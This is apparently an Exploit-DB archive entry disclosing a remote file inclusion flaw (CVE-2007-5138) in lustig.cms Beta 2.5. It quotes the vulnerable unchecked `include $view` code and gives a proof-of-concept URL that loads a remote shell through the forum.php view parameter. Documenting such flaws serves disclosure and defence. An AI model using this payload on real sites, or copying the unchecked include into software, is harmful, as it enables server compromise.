lustig.cms Beta 2.5 - 'forum.php?view' Remote File Inclusion
Author: GoLd_M
type: webapps
platform: php
port:
date_added: 2007-09-26
date_updated: 2016-10-12
verified: 1
codes: OSVDB-39626;CVE-2007-5138
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comlustig.cms_beta_2.5_2.zip
# lustig.cms BETA 2.5 (forum.php view) Remote File Inclusion Vulnerabilities
# D.Scripts : http://dfn.dl.sourceforge.net/sourceforge/lustig-cms/lustig.cms_beta_2.5_2.zip
# V.Code : Line 12 . 13 . 14
# if(isset($view))
# {
# include $view;
# POC : /forum/forum.php?view=Shell
# milw0rm.com [2007-09-27]